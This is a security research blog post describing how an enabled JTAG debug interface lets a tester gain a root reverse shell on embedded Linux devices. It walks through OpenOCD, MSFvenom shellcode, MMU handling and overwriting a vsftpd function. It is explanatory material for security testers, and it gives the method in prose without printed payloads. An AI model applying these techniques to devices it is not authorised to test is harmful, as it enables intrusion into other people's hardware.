Thursday, January 7, 2021

TAPing the Stack for Fun and Profit: Shelling Embedded Linux Devices via JTAG

By Ethan Shackelford

While it may not come as a surprise to those who have worked with embedded devices, it is not uncommon to find the JTAG interface on embedded devices still enabled, even in production. Often cited as providing “ultimate control” over a device, JTAG debugging usually provides the user with full read/write privileges over device memory (and by extension over MMIO) as well as the ability to read and write control registers. 

On a simpler embedded device (for example, a "smart" lock), leveraging open JTAG can be fairly straightforward: dump the bare metal firmware via JTAG, reverse engineer it to determine the details of its operation (such as the function which performs validation on the entered PIN code), and either use the JTAG interface to re-write the firmware in flash, or flip some bits in memory (in this example, to trick the PIN code check logic into accepting an invalid PIN code). 

However, embedded Linux platforms can complicate this process substantially. First, the firmware is not bare-metal, but instead a complex system including a multi-stage bootloader, the Linux kernel image, and various filesystems. Second, storage devices are more likely to be managed and mounted by the kernel, rather than memory-mapped, making access to peripherals over JTAG substantially more complicated than on bare metal systems. Third, MCUs used for embedded Linux tend to have a more robust MMU and memory management scheme, which can make addresses reported by the MMU during JTAG memory access more difficult to correlate to locations in physical memory -- a correlation that is sometimes necessary thanks to the second hurdle created by a more robust MMU, where it also restricts memory access depending on the execution context, which means that the MMU must either be disabled entirely, or configured to suit the task at hand. 

Thus, while open JTAG does usually grant ultimate control over a device, the operations performed are sufficiently low-level as to make actually manipulating a Linux system in this way a difficult and somewhat arcane task. However, operating in a Linux environment does have its perks: rather than the more complex task of manipulating device operation directly over JTAG in a way specific to the particular device being tested as is the case for bare-metal operating systems, leveraging JTAG on any Linux-based device typically revolves around a uniform goal: access to a root shell. This uniformity means that a similar group of techniques can be used to gain access in any case where a Linux-based device has an enabled JTAG interface.

Despite the obvious and widespread nature of this issue, there appears to be little to no existing work published on this topic. To help fill this void, this article is intended to detail the process of using access to a JTAG interface to move to a root shell on a Linux-based device, as well as the common issues and pitfalls which may be encountered therein.

 

Interacting with the TAP controller


While this document will not go into great detail on the inner workings of JTAG and the associated tooling, the following is a short crash course on using OpenOCD and a JTAG hardware adapter to interact with a device’s TAP controller.

Interacting with a device via JTAG requires some means of driving each its pins. This can be accomplished with specialized hardware, such as the SEGGER J-Link series of adapters (which I will use for the purposes of this article), or just as easily with a more generic device like a Bus Blaster or FTDI dongle, such as an FT2232. The experience with a device will vary depending on how well it is supported by OpenOCD -- the Bus Blaster and SEGGER J-Link are both well supported. 

 Determining JTAG pinout on a given board is outside of the scope of this document, but a wealth of information for doing so exists online. Once the pinout has been determined, the device under test and the chosen JTAG adapter should be connected appropriately. Pictured below is the example device and a J-Link adapter, connected based on the determined pinout of the board’s JTAG header.

 

After connecting to the device, OpenOCD can be used to interact with the TAP controller. In order to do so, OpenOCD requires information on the CPU to which you're connected and the adapter used for the connection. A standard installation of OpenOCD will include configuration files for a number of common adapters and targets. It supports many adapter/target combinations out of the box, and on a standard installation the appropriate configs can be found in the target, board, and adapter subdirectories of /usr/local/share/openocd/scripts. 

In this example, we're working with an NXP iMX.28 CPU, and the SEGGER J-Link, so the call to OpenOCD looks like the following:

 

To verify a valid connection, confirm that the reported IDCODE (here 0x079264f3) matches the expected value for the targeted processor; this information can be found in the datasheet for the processor. 

For simple, manual interaction, OpenOCD exposes a telnet listener on port 4444. OpenOCD can also be loaded with TCL script files at launch, by passing additional “-f” flags pointing to the desired scripts. 

Now that we can talk to the TAP controller, we can move on to the various techniques for leveraging the JTAG interface.

 

Techniques


Depending on the processor, the actual implementation of various functions available over JTAG may differ. In general, the same set of primitives will be available: read/write to flash and other memory mapped IO, read/write to various CPU-specific control registers, and read/write to RAM. If you're familiar with more traditional exploitation techniques, these probably sound a lot like read-where/write-where memory-corruption-based exploitation primitives; this is a useful way of thinking of them. 

There are a few constraints to keep in mind while attempting to gain code execution on a Linux device over JTAG:
  • While the JTAG interface has full control of the processor, this doesn’t mean that extra steps won’t be required to make use of it. For example, the debug interface write to any area of RAM, but it will be doing so in the same context as whatever program was running when the CPU was halted. In the context of a Linux system, this means the same rules that apply to programs apply to any memory access by the debug interface – access an area of memory outside the virtual memory space of the currently executing process, and the MMU will reject the memory access and generate a DATA ABORT exception. 
  • Not all execution contexts are created equal. Anyone taking their first steps toward exploiting Linux kernel modules will know that code executed from the context of the kernel (or “Supervisor” from the perspective of the CPU) is generally incompatible with code and exploitation techniques written for userland. While it is possible to tailor shellcode to either context, the context should be kept in mind when setting things up. 
  • As we will see shortly, making our way to a shell from these primitives involves overwriting some section of memory. Of course, if the code or data we overwrite with shellcode is critical to system operation in some way, the system will no longer function as expected, so take care in selecting an area of memory that can be overwritten without interfering with the system as a whole.
For these examples, the following conditions were chosen for exploitation: 
  • We will be exploiting the JTAG access from userspace, rather than from kernel code. There is no real reason for this, other than the fact that it's a bit simpler than acting from kernelspace, and it so happens that any shell on the device under test will be a root shell, so we don’t gain any additional privileges by going the kernelspace route.
  • The device under test provides an Ethernet interface for communication with the outside world. This will be our target for gaining a shell by opening a reverse shell over an unused TCP port. If the device did not have this interface and instead had, say, a UART console, the timing, memory areas, and shellcode chosen would differ somewhat. However, the overall procedure in this article would still apply.
The first step is simply to generate some valid shellcode to load into memory. To generate shellcode for performing our chosen operation, a reverse TCP shell, we use MSFvenom, specifying the target architecture/platform (armv5le, linux). We want the raw byte output, as we’ll be injecting it directly into memory.

 

As illustrated above, the size of the shellcode in this case is 172 bytes. Not huge, but it could certainly pose a problem depending on how the MMU is configured. In fact, in the case of our example device, this tends to exceed the MMU-allowed writable length of memory under $pc, and we will need to address it as we perform some of the techniques outlined below.

Smashing with Precision


Although the famous Phrack article is nearly a quarter-century old at time of writing, the old-school stack smashing of days gone by is alive and well in the embedded world. It is not an entirely uncommon, depending on the architecture family/version and degree of programmer negligence, to find devices in the embedded world which either do not have a “no execute” flag for memory access, or have the flag disabled if it is available. If this is the case, gaining a shell is very straightforward: halt the CPU, overwrite the stack with shellcode, and jump to $sp. In most cases, the stack will have enough space allocated to avoid generating a segmentation fault on write, and is always writable by nature, enabling us to sidestep any MMU shenanigans that might be required for other techniques during exploitation. 
 
This technique requires little to no knowledge of the software running on the device, and generally will not crash or permanently alter the operation of the device. It still might crash, if you get unlucky with the function whose stack is being overwritten, and so isn’t suitable for testing environments where any degree of device malfunction is unacceptable.

 

A number of factors may exclude this technique as a possibility, such as a no-execute bit or stack constraints. It may be possible to work around these factors via the JTAG interface, but in the case that a workaround fails, other techniques are available.

 

Firing From the Hip


In general, device exploitation can be aided by access to a copy of the firmware. If firmware is not available, it's possible to feel your way around the system semi-blind, halting and inspecting configuration registers to determine when you’ve landed in a suitable place. This technique will also routinely crash the device, unless you get incredibly lucky on your first attempt, so this is not a technique suited to an environment where a crashed device is not a recoverable scenario.

The MMU will need to be addressed to allow manipulation of memory, so that shellcode can be written and execution resumed without generating a fault. To do so, we can either reconfigure the MMU to allow reads/writes to the areas to which we want to write, or just disable the MMU entirely. The former option is more complicated to set up, but the latter requires extra work since without the MMU we’ll need to translate virtual addresses to physical addresses ourselves. However, disabling the MMU is also a more universal option, easily applied to a variety of CPUs and architectures.

Here we opt for disabling the MMU, writing shellcode under the memory pointed to by the program counter, then re-enabling the MMU to allow execution to continue without error. There are a few techniques for correlating MMU-enabled (virtual) addresses with the MMU-disabled (physical) addresses; in this case, dumping the full system RAM via JTAG with the MMU disabled, then using a simple homemade tool to match the bytes under the program counter to an offset into the RAM dump. 

  
This tool can be used with the output of OpenOCD’s dump_image command to find where, in the physical address space, a given virtual address is pointing. While the dumped RAM image may not be identical between boots, the locations of loaded binaries in memory will generally stay the same, because the device will tend to run the same programs in the same order every time.

   

 The image above illustrates the process of using OpenOCD in conjunction with the tool:
  1. The CPU is halted here, and found to be in the “User” execution context. If it had been halted under any other context, most likely “Supervisor,” the CPU would be resumed, and the process repeated, until the CPU is halted in the correct execution context. 1024 bytes starting at the program counter are then dumped to a file.
  2. That resulting file is fed into the tool, and found within the dumped RAM image. The tool outputs the address at which a matching sequence of 1024 bytes is found (the physical address).
  3. The MMU is disabled here, and the shellcode is written to the physical address to which the virtual address in the program counter is mapped. The process of disabling the MMU is CPU-specific; information on how to do so can be found in the appropriate reference manual. Here it is accomplished by clearing a specific bit in a specific control register.
  4. The MMU is re-enabled and the memory under the program counter is read to confirm the shellcode has been written. The bytes read match the bytes of the shellcode, confirming we have written to the correct physical address.
  5. The CPU is resumed, with execution continuing from the program counter, our shellcode now occupying the memory to which it points. The netcat listener receives a connection, and a bash shell is available to the attacker. In this case, the shell runs with root privleges.
So, easy right? Not exactly. 

The far more likely outcome during the above process is that the userspace code we randomly halted on will either be some crucial library function, causing a crash at some subsequent step in execution of the shellcode, resulting in a failure to gain a shell and probably breakage of most other device functionality (think overwriting malloc with shellcode), or some piece of code whose absence prevents successful shell access. In practice, actually getting through this process with a shell at the end required around 20-30 attempts on average, with many failed attempts requiring a device reset to un-break critical library code. 

This is fine, if tedious, under circumstances where a device can be reset and taken down arbitrarily. However, in contexts where a device cannot be taken offline or reset, this approach is obviously not viable.

 

Know Thine Enemy


In cases where device firmware is available, or where the exact version of libraries or other software in use by the system are known or possessed, we can take a more targeted approach. The ability to identify the location in physical memory of a binary or library known to be called during device operation enables us to overwrite a function from within that binary or library with shellcode. Upon execution of that particular function as part of the normal operation of the device, the shellcode will run in place of the function normally at that offset into the binary. When we can choose a function to overwrite whose abscence will not cause any anacceptable side effects for the device, we can avoid device crashes or other interruptions.

In the case of the example device, the firmware is available, and we can use one of a variety of binary analysis tools to determine an appropriate function to overwrite. IDA, Binary Ninja, radare, and even the humble objdump are just fine for this purpose. For this example we'll use Binary Ninja. 

In looking for an appropriate function, we should seek the following conditions:
  • The binary or library should be loaded at startup, and continue running during device operation. This ensures that it will be present in RAM when memory is dumped, and that its position in RAM will be the same between boots. This rules out something like a cgi-bin called in response to an HTTP request, which would otherwise be a good candidate.
  • The function should either have some external attacker-accessible trigger, or should be a function that repeats reliably. If the function only runs once, during system boot, the shellcode will never actually execute if it's loaded after the function has been executed.
  • The function should not be system-critical, especially in the case of standard libraries. Its fairly trivial to track down an appropriate version of libc or libpthread, for example, and simply overwrite something like pthread_mutex_unlock, with a pretty strong guarantee that the function will run at some point, triggering the shellcode. However, the next time a function needs to unlock a mytex, the system will come crashing down, requiring a reset.
  • While not required, it can be useful to choose some binary or library whose source code is publicly available, as the code can come in handy to work out the most appropriate function to overwrite and save some time otherwise spent reverse engineering.
After some digging around, we identified a good candidate for shellcode injection in a vsftpd server running on the device. Exclusively used for OTA firmware updates, a lapse in functionality in this server will not interfere with the operation of the device. In a real-world scenario where the ability to initiate an OTA update would eventually be required again, after acquiring root shell access the vsftpd server can be restarted and reloaded into memory uncorrupted by shellcode.

   

Some minimal reverse engineering and cross-referencing against the vsftpd source turns up a function, vsf_sysutil_retval_is_error, which looks like a good choice. It appears to be vsftpd's error checking function, meaning it will likely be called during most operations. This is supported by a fairly large number of cross references in a wide range of functions. One drawback is that the function itself is only eight bytes long, and overwriting it will clobber the function positioned under it in memory. This means that the vsftpd server is toast after our exploit is fired, but as mentioned before, we can simply restart the vsftpd server from our root shell if desired. 
 
Using the same tool as in the previous techniques, we find the physical address in RAM of the function we'd like to overwrite. This time, rather than searching for the bytes dumped from under $pc, we look for 0x100 bytes or so from the vsftpd binary, starting at the beginning of the target function. This can be done with dd, or just by copying-and-pasting if you're using Binary Ninja or similarly equipped software.

   

Moving back to the JTAG connection, we can now write to the acquired physical address (shown in the preceeding image), overwriting the target function with shellcode. To trigger its execution, we'll use an FTP client to connect to the target device, which at some point calls the vsf_sysutil_retval_is_error function as expected. 

 

Further Reading

  • JTAG Explained (finally!) - A fantastic introduction to JTAG from a security perspective, including some information on performing a similar attack on a device with an exposed UART console.
  • JTAGTest.com Pinout Reference - A useful collection of various standard JTAG header pinouts, useful for identifying mystery pinouts on boards under test.
  • Smashing The Stack For Fun And Profit - A must read for the aspiring hardware hacker, many of the points discussed within apply equally when working with a device over a JTAG connection.

References